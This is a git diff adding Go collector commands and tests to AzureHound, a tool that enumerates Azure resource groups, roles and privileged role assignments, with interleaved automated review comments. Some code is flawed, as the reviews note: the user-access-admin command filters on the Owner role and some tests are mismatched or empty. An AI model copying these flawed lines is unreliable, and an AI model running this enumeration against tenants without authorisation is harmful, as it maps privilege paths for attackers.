+ log.V(2).Info("found resourceGroup role assignment", "resourceGroupRoleAssignment", resourceGroupRoleAssignment)
+ count++
+ resourceGroupRoleAssignments.RoleAssignments = append(resourceGroupRoleAssignments.RoleAssignments, resourceGroupRoleAssignment)
+ }
+ }
+ if ok := pipeline.Send(ctx.Done(), out, NewAzureWrapper(enums.KindAZResourceGroupRoleAssignment, resourceGroupRoleAssignments)); !ok {
+ return
+ }
+ log.V(1).Info("finished listing resourceGroup role assignments", "resourceGroupId", id, "count", count)
+ }
+ }()
+ }
+
+ go func() {
+ wg.Wait()
+ close(out)
+ log.Info("finished listing all resource group role assignments")
+ }()
+
+ return out
+}
diff --git a/cmd/list-resource-group-role-assignments_test.go b/cmd/list-resource-group-role-assignments_test.go
new file mode 100644
index 0000000..8b1ac8d
--- /dev/null
+++ b/cmd/list-resource-group-role-assignments_test.go
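Review bot: When `client.ListRoleAssignmentsForResource` yields an error in listResourceGroupRoleAssignments, the loop logs it and keeps going, then sends whatever was collected under the normal `KindAZResourceGroupRoleAssignment` wrapper and logs "finished listing", so the owner and user-access-admin stages downstream cannot tell a complete list from a truncated one. For an access review a silently short list reads as "no such assignment". Track the failure, e.g. set `incomplete = true` in the error branch and add `"incomplete", incomplete` to the final `log.V(1).Info` call, or skip the send for that resource group. Separately, `result.(AzureWrapper)` in the first goroutine is a single-value assertion, so a value of another type panics before the `!ok` branch is reached; the same expression is in listResourceGroups and in the list-role-assignments.go hunk.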
@@ -0,0 +1,106 @@
+// Copyright (C) 2022 Specter Ops, Inc.
+//
+// This file is part of AzureHound.
+//
+// AzureHound is free software: you can redistribute it and/or modify
+// it under the terms of the GNU General Public License as published by
+// the Free Software Foundation, either version 3 of the License, or
+// (at your option) any later version.
+//
+// AzureHound is distributed in the hope that it will be useful,
+// but WITHOUT ANY WARRANTY; without even the implied warranty of
+// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+// GNU General Public License for more details.
+//
+// You should have received a copy of the GNU General Public License
+// along with this program. If not, see .
+
+package cmd
+
+import (
+ "context"
+ "fmt"
+ "testing"
+
+ "github.com/bloodhoundad/azurehound/v2/client"
+ "github.com/bloodhoundad/azurehound/v2/client/mocks"
+ "github.com/bloodhoundad/azurehound/v2/constants"
+ "github.com/bloodhoundad/azurehound/v2/models"
+ "github.com/bloodhoundad/azurehound/v2/models/azure"
+ "go.uber.org/mock/gomock"
+)
+
+func init() {
+ setupLogger()
+}
+
+func TestListManagementGroupRoleAssignments(t *testing.T) {
+ ctrl := gomock.NewController(t)
+ defer ctrl.Finish()
+ ctx := context.Background()
+
+ mockClient := mocks.NewMockAzureClient(ctrl)
+
+ mockManagementGroupsChannel := make(chan interface{})
+ mockManagementGroupRoleAssignmentChannel := make(chan client.AzureResult[azure.RoleAssignment])
+ mockManagementGroupRoleAssignmentChannel2 := make(chan client.AzureResult[azure.RoleAssignment])
+
+ mockTenant := azure.Tenant{}
+ mockError := fmt.Errorf("I'm an error")
+ mockClient.EXPECT().TenantInfo().Return(mockTenant).AnyTimes()
+ mockClient.EXPECT().ListRoleAssignmentsForResource(gomock.Any(), gomock.Any(), gomock.Any(), gomock.Any()).Return(mockManagementGroupRoleAssignmentChannel).Times(1)
+ mockClient.EXPECT().ListRoleAssignmentsForResource(gomock.Any(), gomock.Any(), gomock.Any(), gomock.Any()).Return(mockManagementGroupRoleAssignmentChannel2).Times(1)
+ channel := listManagementGroupRoleAssignments(ctx, mockClient, mockManagementGroupsChannel)
+
+ go func() {
+ defer close(mockManagementGroupsChannel)
+ mockManagementGroupsChannel <- AzureWrapper{
+ Data: models.ManagementGroup{},
+ }
+ mockManagementGroupsChannel <- AzureWrapper{
+ Data: models.ManagementGroup{},
+ }
+ }()
+ go func() {
+ defer close(mockManagementGroupRoleAssignmentChannel)
+ mockManagementGroupRoleAssignmentChannel <- client.AzureResult[azure.RoleAssignment]{
+ Ok: azure.RoleAssignment{
+ Properties: azure.RoleAssignmentPropertiesWithScope{
+ RoleDefinitionId: constants.ContributorRoleID,
+ },
+ },
+ }
+ mockManagementGroupRoleAssignmentChannel <- client.AzureResult[azure.RoleAssignment]{
+ Ok: azure.RoleAssignment{
+ Properties: azure.RoleAssignmentPropertiesWithScope{
+ RoleDefinitionId: constants.OwnerRoleID,
+ },
+ },
+ }
+ }()
+ go func() {
+ defer close(mockManagementGroupRoleAssignmentChannel2)
+ mockManagementGroupRoleAssignmentChannel2 <- client.AzureResult[azure.RoleAssignment]{
+ Ok: azure.RoleAssignment{
+ Properties: azure.RoleAssignmentPropertiesWithScope{
+ RoleDefinitionId: constants.OwnerRoleID,
+ },
+ },
+ }
+ mockManagementGroupRoleAssignmentChannel2 <- client.AzureResult[azure.RoleAssignment]{
+ Error: mockError,
+ }
+ }()
+
+ if result, ok := <-channel; !ok {
+ t.Fatalf("failed to receive from channel")
+ } else if len(result.Data.RoleAssignments) != 2 {
+ t.Errorf("got %v, want %v", len(result.Data.RoleAssignments), 2)
+ }
+
+ if result, ok := <-channel; !ok {
+ t.Fatalf("failed to receive from channel")
+ } else if len(result.Data.RoleAssignments) != 1 {
+ t.Errorf("got %v, want %v", len(result.Data.RoleAssignments), 2)
+ }
+}
diff --git a/cmd/list-resource-group-user-access-admins.go b/cmd/list-resource-group-user-access-admins.go
new file mode 100644
index 0000000..0762c77
--- /dev/null
+++ b/cmd/list-resource-group-user-access-admins.go
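Review bot: This file is named for resource-group role assignments, but its only test is `TestListManagementGroupRoleAssignments`, which calls `listManagementGroupRoleAssignments`; `listResourceGroupRoleAssignments` from the previous file is not exercised at all. If another test file in package cmd declares the same test name, the package will not compile. Rename the test to `TestListResourceGroupRoleAssignments`, call `listResourceGroupRoleAssignments`, and feed it `models.ResourceGroup{}` values. The second failure message also prints `want 2` where the check is `!= 1`; it should read `t.Errorf("got %v, want %v", len(result.Data.RoleAssignments), 1)`.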
@@ -0,0 +1,81 @@
+// Copyright (C) 2022 Specter Ops, Inc.
+//
+// This file is part of AzureHound.
+//
+// AzureHound is free software: you can redistribute it and/or modify
+// it under the terms of the GNU General Public License as published by
+// the Free Software Foundation, either version 3 of the License, or
+// (at your option) any later version.
+//
+// AzureHound is distributed in the hope that it will be useful,
+// but WITHOUT ANY WARRANTY; without even the implied warranty of
+// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+// GNU General Public License for more details.
+//
+// You should have received a copy of the GNU General Public License
+// along with this program. If not, see .
+
+package cmd
+
+import (
+ "context"
+ "os"
+ "os/signal"
+ "time"
+
+ "github.com/bloodhoundad/azurehound/v2/constants"
+ "github.com/bloodhoundad/azurehound/v2/enums"
+ "github.com/bloodhoundad/azurehound/v2/internal"
+ "github.com/bloodhoundad/azurehound/v2/models"
+ "github.com/bloodhoundad/azurehound/v2/panicrecovery"
+ "github.com/bloodhoundad/azurehound/v2/pipeline"
+ "github.com/spf13/cobra"
+)
+
+func init() {
+ listRootCmd.AddCommand(listResourceGroupUserAccessAdminsCmd)
+}
+
+var listResourceGroupUserAccessAdminsCmd = &cobra.Command{
+ Use: "resource-group-user-access-admins",
+ Long: "Lists Azure Resource Group User Access Admins",
+ Run: listResourceGroupUserAccessAdminsCmdImpl,
+ SilenceUsage: true,
+}
+
+func listResourceGroupUserAccessAdminsCmdImpl(cmd *cobra.Command, args []string) {
+ ctx, stop := signal.NotifyContext(cmd.Context(), os.Interrupt, os.Kill)
+ defer gracefulShutdown(stop)
+
+ log.V(1).Info("testing connections")
+ azClient := connectAndCreateClient()
+ log.Info("collecting azure resource group user access admins...")
+ start := time.Now()
+ subscriptions := listSubscriptions(ctx, azClient)
+ resourceGroups := listResourceGroups(ctx, azClient, subscriptions)
+ roleAssignments := listResourceGroupRoleAssignments(ctx, azClient, resourceGroups)
+ panicrecovery.HandleBubbledPanic(ctx, stop, log)
+ stream := listResourceGroupUserAccessAdmins(ctx, roleAssignments)
+ outputStream(ctx, stream)
+ duration := time.Since(start)
+ log.Info("collection completed", "duration", duration.String())
+}
+
+func listResourceGroupUserAccessAdmins(
+ ctx context.Context,
+ roleAssignments <-chan azureWrapper[models.ResourceGroupRoleAssignments],
+) <-chan any {
+ return pipeline.Map(ctx.Done(), roleAssignments, func(ra azureWrapper[models.ResourceGroupRoleAssignments]) any {
+ filteredAssignments := internal.Filter(ra.Data.RoleAssignments, rgRoleAssignmentFilter(constants.OwnerRoleID))
+ uaas := internal.Map(filteredAssignments, func(ra models.ResourceGroupRoleAssignment) models.ResourceGroupUserAccessAdmin {
+ return models.ResourceGroupUserAccessAdmin{
+ UserAccessAdmin: ra.RoleAssignment,
+ ResourceGroupId: ra.ResourceGroupId,
+ }
+ })
+ return NewAzureWrapper(enums.KindAZResourceGroupUserAccessAdmin, models.ResourceGroupUserAccessAdmins{
+ ResourceGroupId: ra.Data.ResourceGroupId,
+ UserAccessAdmins: uaas,
+ })
+ })
+}
diff --git a/cmd/list-resource-group-user-access-admins_test.go b/cmd/list-resource-group-user-access-admins_test.go
new file mode 100644
index 0000000..8ba792c
--- /dev/null
+++ b/cmd/list-resource-group-user-access-admins_test.go
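Review bot: listResourceGroupUserAccessAdmins filters with `rgRoleAssignmentFilter(constants.OwnerRoleID)`, the same constant listResourceGroupOwners uses, so the `KindAZResourceGroupUserAccessAdmin` output would carry Owner assignments and miss User Access Administrator ones (assuming the filter matches on role definition id; its body is not in this hunk). The test file for this command builds its fixture with `constants.UserAccessAdminRoleID`, which suggests the intended line is `filteredAssignments := internal.Filter(ra.Data.RoleAssignments, rgRoleAssignmentFilter(constants.UserAccessAdminRoleID))`. Mislabelled role data feeds directly into access-path analysis, so the test should assert on the filtered content as well.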
@@ -0,0 +1,76 @@
+// Copyright (C) 2022 Specter Ops, Inc.
+//
+// This file is part of AzureHound.
+//
+// AzureHound is free software: you can redistribute it and/or modify
+// it under the terms of the GNU General Public License as published by
+// the Free Software Foundation, either version 3 of the License, or
+// (at your option) any later version.
+//
+// AzureHound is distributed in the hope that it will be useful,
+// but WITHOUT ANY WARRANTY; without even the implied warranty of
+// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+// GNU General Public License for more details.
+//
+// You should have received a copy of the GNU General Public License
+// along with this program. If not, see .
+
+package cmd
+
+import (
+ "context"
+ "testing"
+
+ "github.com/bloodhoundad/azurehound/v2/client/mocks"
+ "github.com/bloodhoundad/azurehound/v2/constants"
+ "github.com/bloodhoundad/azurehound/v2/enums"
+ "github.com/bloodhoundad/azurehound/v2/models"
+ "github.com/bloodhoundad/azurehound/v2/models/azure"
+ "go.uber.org/mock/gomock"
+)
+
+func init() {
+ setupLogger()
+}
+
+func TestListResourceGroupUserAccessAdmins(t *testing.T) {
+ ctrl := gomock.NewController(t)
+ defer ctrl.Finish()
+ ctx := context.Background()
+
+ mockClient := mocks.NewMockAzureClient(ctrl)
+
+ mockRoleAssignmentsChannel := make(chan azureWrapper[models.ResourceGroupRoleAssignments])
+ mockTenant := azure.Tenant{}
+ mockClient.EXPECT().TenantInfo().Return(mockTenant).AnyTimes()
+ channel := listResourceGroupUserAccessAdmins(ctx, mockRoleAssignmentsChannel)
+
+ go func() {
+ defer close(mockRoleAssignmentsChannel)
+
+ mockRoleAssignmentsChannel <- NewAzureWrapper(
+ enums.KindAZResourceGroupRoleAssignment,
+ models.ResourceGroupRoleAssignments{
+ ResourceGroupId: "foo",
+ RoleAssignments: []models.ResourceGroupRoleAssignment{
+ {
+ RoleAssignment: azure.RoleAssignment{
+ Name: constants.UserAccessAdminRoleID,
+ Properties: azure.RoleAssignmentPropertiesWithScope{
+ RoleDefinitionId: constants.UserAccessAdminRoleID,
+ },
+ },
+ },
+ },
+ },
+ )
+ }()
+
+ if _, ok := <-channel; !ok {
+ t.Fatalf("failed to receive from channel")
+ }
+
+ if _, ok := <-channel; ok {
+ t.Error("should not have recieved from channel")
+ }
+}
diff --git a/cmd/list-resource-groups.go b/cmd/list-resource-groups.go
new file mode 100644
index 0000000..586279c
--- /dev/null
+++ b/cmd/list-resource-groups.go
@@ -0,0 +1,127 @@
+// Copyright (C) 2022 Specter Ops, Inc.
+//
+// This file is part of AzureHound.
+//
+// AzureHound is free software: you can redistribute it and/or modify
+// it under the terms of the GNU General Public License as published by
+// the Free Software Foundation, either version 3 of the License, or
+// (at your option) any later version.
+//
+// AzureHound is distributed in the hope that it will be useful,
+// but WITHOUT ANY WARRANTY; without even the implied warranty of
+// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+// GNU General Public License for more details.
+//
+// You should have received a copy of the GNU General Public License
+// along with this program. If not, see .
+
+package cmd
+
+import (
+ "context"
+ "fmt"
+ "os"
+ "os/signal"
+ "sync"
+ "time"
+
+ "github.com/bloodhoundad/azurehound/v2/client"
+ "github.com/bloodhoundad/azurehound/v2/client/query"
+ "github.com/bloodhoundad/azurehound/v2/config"
+ "github.com/bloodhoundad/azurehound/v2/enums"
+ "github.com/bloodhoundad/azurehound/v2/models"
+ "github.com/bloodhoundad/azurehound/v2/panicrecovery"
+ "github.com/bloodhoundad/azurehound/v2/pipeline"
+ "github.com/spf13/cobra"
+)
+
+func init() {
+ listRootCmd.AddCommand(listResourceGroupsCmd)
+}
+
+var listResourceGroupsCmd = &cobra.Command{
+ Use: "resource-groups",
+ Long: "Lists Azure Resource Groups",
+ Run: listResourceGroupsCmdImpl,
+ SilenceUsage: true,
+}
+
+func listResourceGroupsCmdImpl(cmd *cobra.Command, args []string) {
+ ctx, stop := signal.NotifyContext(cmd.Context(), os.Interrupt, os.Kill)
+ defer gracefulShutdown(stop)
+
+ log.V(1).Info("testing connections")
+ azClient := connectAndCreateClient()
+ log.Info("collecting azure resource groups...")
+ start := time.Now()
+ stream := listResourceGroups(ctx, azClient, listSubscriptions(ctx, azClient))
+ panicrecovery.HandleBubbledPanic(ctx, stop, log)
+ outputStream(ctx, stream)
+ duration := time.Since(start)
+ log.Info("collection completed", "duration", duration.String())
+}
+
+func listResourceGroups(ctx context.Context, client client.AzureClient, subscriptions <-chan interface{}) <-chan interface{} {
+ var (
+ out = make(chan interface{})
+ ids = make(chan string)
+ streams = pipeline.Demux(ctx.Done(), ids, config.ColStreamCount.Value().(int))
+ wg sync.WaitGroup
+ )
+
+ go func() {
+ defer panicrecovery.PanicRecovery()
+ defer close(ids)
+
+ for result := range pipeline.OrDone(ctx.Done(), subscriptions) {
+ if subscription, ok := result.(AzureWrapper).Data.(models.Subscription); !ok {
+ log.Error(fmt.Errorf("failed type assertion"), "unable to continue enumerating resource groups", "result", result)
+ return
+ } else {
+ if ok := pipeline.Send(ctx.Done(), ids, subscription.SubscriptionId); !ok {
+ return
+ }
+ }
+ }
+ }()
+
+ wg.Add(len(streams))
+ for i := range streams {
+ stream := streams[i]
+ go func() {
+ defer panicrecovery.PanicRecovery()
+ defer wg.Done()
+ for id := range stream {
+ count := 0
+ for item := range client.ListAzureResourceGroups(ctx, id, query.RMParams{Top: 1000}) {
+ if item.Error != nil {
+ log.Error(item.Error, "unable to continue processing resource groups for this subscription", "subscriptionId", id)
+ } else {
+ resourceGroup := models.ResourceGroup{
+ ResourceGroup: item.Ok,
+ SubscriptionId: "/subscriptions/" + id,
+ TenantId: client.TenantInfo().TenantId,
+ }
+ log.V(2).Info("found resource group", "resourceGroup", resourceGroup)
+ count++
+ if ok := pipeline.SendAny(ctx.Done(), out, AzureWrapper{
+ Kind: enums.KindAZResourceGroup,
+ Data: resourceGroup,
+ }); !ok {
+ return
+ }
+ }
+ }
+ log.V(1).Info("finished listing resource groups", "subscriptionId", id, "count", count)
+ }
+ }()
+ }
+
+ go func() {
+ wg.Wait()
+ close(out)
+ log.Info("finished listing all resource groups")
+ }()
+
+ return out
+}
diff --git a/cmd/list-resource-groups_test.go b/cmd/list-resource-groups_test.go
new file mode 100644
index 0000000..19009a6
--- /dev/null
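Review bot: listResourceGroups has no doc comment, and two parts of its contract are not obvious from the signature: with more than one worker the results arrive in no fixed order, and `SubscriptionId` is emitted as the path `"/subscriptions/" + id` rather than the bare id it received. A comment such as `// listResourceGroups emits one AzureWrapper (KindAZResourceGroup) per resource group of each incoming subscription; order is not deterministic and out is closed when all workers finish.` would cover it. The error branch also logs "unable to continue" and then continues the loop, so the message could instead say that the listing for this subscription may be incomplete.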
+++ b/cmd/list-resource-groups_test.go 
@@ -0,0 +1,109 @@
+// Copyright (C) 2022 Specter Ops, Inc.
+//
+// This file is part of AzureHound.
+//
+// AzureHound is free software: you can redistribute it and/or modify
+// it under the terms of the GNU General Public License as published by
+// the Free Software Foundation, either version 3 of the License, or
+// (at your option) any later version.
+//
+// AzureHound is distributed in the hope that it will be useful,
+// but WITHOUT ANY WARRANTY; without even the implied warranty of
+// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+// GNU General Public License for more details.
+//
+// You should have received a copy of the GNU General Public License
+// along with this program. If not, see .
+
+package cmd
+
+import (
+ "context"
+ "fmt"
+ "testing"
+
+ "github.com/bloodhoundad/azurehound/v2/client"
+ "github.com/bloodhoundad/azurehound/v2/client/mocks"
+ "github.com/bloodhoundad/azurehound/v2/models"
+ "github.com/bloodhoundad/azurehound/v2/models/azure"
+ "go.uber.org/mock/gomock"
+)
+
+func init() {
+ setupLogger()
+}
+
+func TestListResourceGroups(t *testing.T) {
+ ctrl := gomock.NewController(t)
+ defer ctrl.Finish()
+ ctx := context.Background()
+
+ mockClient := mocks.NewMockAzureClient(ctrl)
+
+ mockSubscriptionsChannel := make(chan interface{})
+ mockResourceGroupChannel := make(chan client.AzureResult[azure.ResourceGroup])
+ mockResourceGroupChannel2 := make(chan client.AzureResult[azure.ResourceGroup])
+
+ mockTenant := azure.Tenant{}
+ mockError := fmt.Errorf("I'm an error")
+ mockClient.EXPECT().TenantInfo().Return(mockTenant).AnyTimes()
+ mockClient.EXPECT().ListAzureResourceGroups(gomock.Any(), gomock.Any(), gomock.Any()).Return(mockResourceGroupChannel).Times(1)
+ mockClient.EXPECT().ListAzureResourceGroups(gomock.Any(), gomock.Any(), gomock.Any()).Return(mockResourceGroupChannel2).Times(1)
+ channel := listResourceGroups(ctx, mockClient, mockSubscriptionsChannel)
+
+ go func() {
+ defer close(mockSubscriptionsChannel)
+ mockSubscriptionsChannel <- AzureWrapper{
+ Data: models.Subscription{},
+ }
+ mockSubscriptionsChannel <- AzureWrapper{
+ Data: models.Subscription{},
+ }
+ }()
+ go func() {
+ defer close(mockResourceGroupChannel)
+ mockResourceGroupChannel <- client.AzureResult[azure.ResourceGroup]{
+ Ok: azure.ResourceGroup{},
+ }
+ mockResourceGroupChannel <- client.AzureResult[azure.ResourceGroup]{
+ Ok: azure.ResourceGroup{},
+ }
+ }()
+ go func() {
+ defer close(mockResourceGroupChannel2)
+ mockResourceGroupChannel2 <- client.AzureResult[azure.ResourceGroup]{
+ Ok: azure.ResourceGroup{},
+ }
+ mockResourceGroupChannel2 <- client.AzureResult[azure.ResourceGroup]{
+ Error: mockError,
+ }
+ }()
+
+ if result, ok := <-channel; !ok {
+ t.Fatalf("failed to receive from channel")
+ } else if wrapper, ok := result.(AzureWrapper); !ok {
+ t.Errorf("failed type assertion: got %T, want %T", result, AzureWrapper{})
+ } else if _, ok := wrapper.Data.(models.ResourceGroup); !ok {
+ t.Errorf("failed type assertion: got %T, want %T", wrapper.Data, models.ResourceGroup{})
+ }
+
+ if result, ok := <-channel; !ok {
+ t.Fatalf("failed to receive from channel")
+ } else if wrapper, ok := result.(AzureWrapper); !ok {
+ t.Errorf("failed type assertion: got %T, want %T", result, AzureWrapper{})
+ } else if _, ok := wrapper.Data.(models.ResourceGroup); !ok {
+ t.Errorf("failed type assertion: got %T, want %T", wrapper.Data, models.ResourceGroup{})
+ }
+
+ if result, ok := <-channel; !ok {
+ t.Fatalf("failed to receive from channel")
+ } else if wrapper, ok := result.(AzureWrapper); !ok {
+ t.Errorf("failed type assertion: got %T, want %T", result, AzureWrapper{})
+ } else if _, ok := wrapper.Data.(models.ResourceGroup); !ok {
+ t.Errorf("failed type assertion: got %T, want %T", wrapper.Data, models.ResourceGroup{})
+ }
+
+ if _, ok := <-channel; ok {
+ t.Error("should not have recieved from channel")
+ }
+}
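Review bot: The three identical receive-and-assert blocks in TestListResourceGroups could be one loop, `for i := 0; i < 3; i++ { … }`, which also puts the expected count (two groups from one subscription, one from the other before its error) in a single place. Both `ListAzureResourceGroups` expectations use `gomock.Any()` for the subscription id and both fixtures are empty `models.Subscription{}` values, so the test does not check which id reaches the client or the `"/subscriptions/"` prefix on the emitted `SubscriptionId`.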
diff --git a/cmd/list-role-assignments.go b/cmd/list-role-assignments.go
new file mode 100644
index 0000000..d9fa24b
--- /dev/null
+++ b/cmd/list-role-assignments.go
@@ -0,0 +1,136 @@
+// Copyright (C) 2022 Specter Ops, Inc.
+//
+// This file is part of AzureHound.
+//
+// AzureHound is free software: you can redistribute it and/or modify
+// it under the terms of the GNU General Public License as published by
+// the Free Software Foundation, either version 3 of the License, or
+// (at your option) any later version.
+//
+// AzureHound is distributed in the hope that it will be useful,
+// but WITHOUT ANY WARRANTY; without even the implied warranty of
+// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+// GNU General Public License for more details.
+//
+// You should have received a copy of the GNU General Public License
+// along with this program. If not, see .
+
+package cmd
+
+import (
+ "context"
+ "fmt"
+ "os"
+ "os/signal"
+ "sync"
+ "time"
+
+ "github.com/bloodhoundad/azurehound/v2/client"
+ "github.com/bloodhoundad/azurehound/v2/client/query"
+ "github.com/bloodhoundad/azurehound/v2/config"
+ "github.com/bloodhoundad/azurehound/v2/enums"
+ "github.com/bloodhoundad/azurehound/v2/models"
+ "github.com/bloodhoundad/azurehound/v2/panicrecovery"
+ "github.com/bloodhoundad/azurehound/v2/pipeline"
+ "github.com/spf13/cobra"
+)
+
+func init() {
+ listRootCmd.AddCommand(listRoleAssignmentsCmd)
+}
+
+var listRoleAssignmentsCmd = &cobra.Command{
+ Use: "role-assignments",
+ Long: "Lists Azure Active Directory Role Assignments",
+ Run: listRoleAssignmentsCmdImpl,
+ SilenceUsage: true,
+}
+
+func listRoleAssignmentsCmdImpl(cmd *cobra.Command, args []string) {
+ ctx, stop := signal.NotifyContext(cmd.Context(), os.Interrupt, os.Kill)
+ defer gracefulShutdown(stop)
+
+ log.V(1).Info("testing connections")
+ azClient := connectAndCreateClient()
+ log.Info("collecting azure active directory role assignments...")
+ start := time.Now()
+ roles := listRoles(ctx, azClient)
+ stream := listRoleAssignments(ctx, azClient, roles)
+ panicrecovery.HandleBubbledPanic(ctx, stop, log)
+ outputStream(ctx, stream)
+ duration := time.Since(start)
+ log.Info("collection completed", "duration", duration.String())
+}
+
+func listRoleAssignments(ctx context.Context, client client.AzureClient, roles <-chan interface{}) <-chan interface{} {
+ var (
+ out = make(chan interface{})
+ ids = make(chan string)
+ streams = pipeline.Demux(ctx.Done(), ids, config.ColStreamCount.Value().(int))
+ wg sync.WaitGroup
+ )
+
+ go func() {
+ defer panicrecovery.PanicRecovery()
+ defer close(ids)
+
+ for result := range pipeline.OrDone(ctx.Done(), roles) {
+ if role, ok := result.(AzureWrapper).Data.(models.Role); !ok {
+ log.Error(fmt.Errorf("failed type assertion"), "unable to continue enumerating role assignments", "result", result)
+ return
+ } else {
+ if ok := pipeline.Send(ctx.Done(), ids, role.Id); !ok {
+ return
+ }
+ }
+ }
+ }()
+
+ wg.Add(len(streams))
+ for i := range streams {
+ stream := streams[i]
+ go func() {
+ defer panicrecovery.PanicRecovery()
+ defer wg.Done()
+ for id := range stream {
+ var (
+ roleAssignments = models.RoleAssignments{
+ RoleDefinitionId: id,
+ TenantId: client.TenantInfo().TenantId,
+ }
+ count = 0
+ filter = fmt.Sprintf("roleDefinitionId eq '%s'", id)
+ )
+ // We expand directoryScope in order to obtain the appId from app specific scoped role assignments
+ for item := range client.ListAzureADRoleAssignments(ctx, query.GraphParams{Filter: filter, Expand: "directoryScope"}) {
+ if item.Error != nil {
+ log.Error(item.Error, "unable to continue processing role assignments for this role", "roleDefinitionId", id)
+ } else {
+ log.V(2).Info("found role assignment", "roleAssignments", item)
+ count++
+ // To ensure proper linking to AZApp nodes we want to supply the AppId instead when role assignments are app specific scoped
+ if item.Ok.DirectoryScopeId != "/" {
+ item.Ok.DirectoryScopeId = fmt.Sprintf("/%s", item.Ok.DirectoryScope.AppId)
+ }
+ roleAssignments.RoleAssignments = append(roleAssignments.RoleAssignments, item.Ok)
+ }
+ }
+ if ok := pipeline.SendAny(ctx.Done(), out, 
AzureWrapper{ + Kind: enums.KindAZRoleAssignment, + Data: roleAssignments, + }); !ok { + return + } + log.V(1).Info("finished listing role assignments", "roleDefinitionId", id, "count", count) + } + }() + } + + go func() { + wg.Wait() + close(out) + log.Info("finished listing all role assignments") + }() + + return out +} diff --git a/cmd/list-role-assignments_test.go b/cmd/list-role-assignments_test.go new file mode 100644 index 0000000..2dd8195 --- /dev/null +++ b/cmd/list-role-assignments_test.go @@ -0,0 +1,33 @@ +// Copyright (C) 2022 Specter Ops, Inc. +// +// This file is part of AzureHound. +// +// AzureHound is free software: you can redistribute it and/or modify +// it under the terms of the GNU General Public License as published by +// the Free Software Foundation, either version 3 of the License, or +// (at your option) any later version. +// +// AzureHound is distributed in the hope that it will be useful, +// but WITHOUT ANY WARRANTY; without even the implied warranty of +// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +// GNU General Public License for more details. +// +// You should have received a copy of the GNU General Public License +// along with this program. If not, see . + +package cmd + +import ( + "testing" + + "go.uber.org/mock/gomock" +) + +func init() { + setupLogger() +} + +func TestListRoleAssignments(t *testing.T) { + ctrl := gomock.NewController(t) + defer ctrl.Finish() +} diff --git a/cmd/list-roles.go b/cmd/list-roles.go new file mode 100644 index 0000000..7a377c6 --- /dev/null +++ b/cmd/list-roles.go 
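Review bot: In listRoleAssignments (cmd/list-role-assignments.go), every assignment whose `DirectoryScopeId` is not `/` is rewritten to `fmt.Sprintf("/%s", item.Ok.DirectoryScope.AppId)` without checking that the expanded scope is an application. The type of `DirectoryScope` is not visible in this hunk, but if the scope is another kind of directory object, `AppId` would presumably be empty and the scoped assignment would be emitted with scope `/`. That reads as tenant-wide and overstates the principal's reach in the collected data. Guard the rewrite, e.g. `if item.Ok.DirectoryScopeId != "/" && item.Ok.DirectoryScope.AppId != "" {`, and keep the original scope id otherwise.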
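Review bot: TestListRoleAssignments in cmd/list-role-assignments_test.go only creates and finishes a gomock controller; it never calls `listRoleAssignments` and asserts nothing, so it passes whatever the collector does. The scope rewriting and the log-and-continue error path in listRoleAssignments therefore have no coverage. Either model it on TestListServicePrincipalOwners from this patch (mock `ListAzureADRoleAssignments`, feed `AzureWrapper{Data: models.Role{}}` values, assert on `models.RoleAssignments`), or mark it with `t.Skip("TODO: cover listRoleAssignments")` so the gap shows in test output.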
@@ -0,0 +1,91 @@ +// Copyright (C) 2022 Specter Ops, Inc. +// +// This file is part of AzureHound. +// +// AzureHound is free software: you can redistribute it and/or modify +// it under the terms of the GNU General Public License as published by +// the Free Software Foundation, either version 3 of the License, or +// (at your option) any later version. +// +// AzureHound is distributed in the hope that it will be useful, +// but WITHOUT ANY WARRANTY; without even the implied warranty of +// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +// GNU General Public License for more details. +// +// You should have received a copy of the GNU General Public License +// along with this program. If not, see . + +package cmd + +import ( + "context" + "os" + "os/signal" + "time" + + "github.com/bloodhoundad/azurehound/v2/client" + "github.com/bloodhoundad/azurehound/v2/client/query" + "github.com/bloodhoundad/azurehound/v2/enums" + "github.com/bloodhoundad/azurehound/v2/models" + "github.com/bloodhoundad/azurehound/v2/panicrecovery" + "github.com/bloodhoundad/azurehound/v2/pipeline" + "github.com/spf13/cobra" +) + +func init() { + listRootCmd.AddCommand(listRolesCmd) +} + +var listRolesCmd = &cobra.Command{ + Use: "roles", + Long: "Lists Azure Active Directory Roles", + Run: listRolesCmdImpl, + SilenceUsage: true, +} + +func listRolesCmdImpl(cmd *cobra.Command, args []string) { + ctx, stop := signal.NotifyContext(cmd.Context(), os.Interrupt, os.Kill) + defer gracefulShutdown(stop) + + log.V(1).Info("testing connections") + azClient := connectAndCreateClient() + log.Info("collecting azure active directory roles...") + start := time.Now() + stream := listRoles(ctx, azClient) + panicrecovery.HandleBubbledPanic(ctx, stop, log) + outputStream(ctx, stream) + duration := time.Since(start) + log.Info("collection completed", "duration", duration.String()) +} + +func listRoles(ctx context.Context, client client.AzureClient) <-chan interface{} { + out := make(chan 
interface{})
+
+ go func() {
+ defer panicrecovery.PanicRecovery()
+ defer close(out)
+ count := 0
+ for item := range client.ListAzureADRoles(ctx, query.GraphParams{}) {
+ if item.Error != nil {
+ log.Error(item.Error, "unable to continue processing roles")
+ return
+ } else {
+ log.V(2).Info("found role", "role", item)
+ count++
+ if ok := pipeline.SendAny(ctx.Done(), out, AzureWrapper{
+ Kind: enums.KindAZRole,
+ Data: models.Role{
+ Role: item.Ok,
+ TenantId: client.TenantInfo().TenantId,
+ TenantName: client.TenantInfo().DisplayName,
+ },
+ }); !ok {
+ return
+ }
+ }
+ }
+ log.Info("finished listing all roles", "count", count)
+ }()
+
+ return out
+}
diff --git a/cmd/list-roles_test.go b/cmd/list-roles_test.go
new file mode 100644
index 0000000..09cdcb5
--- /dev/null
+++ b/cmd/list-roles_test.go
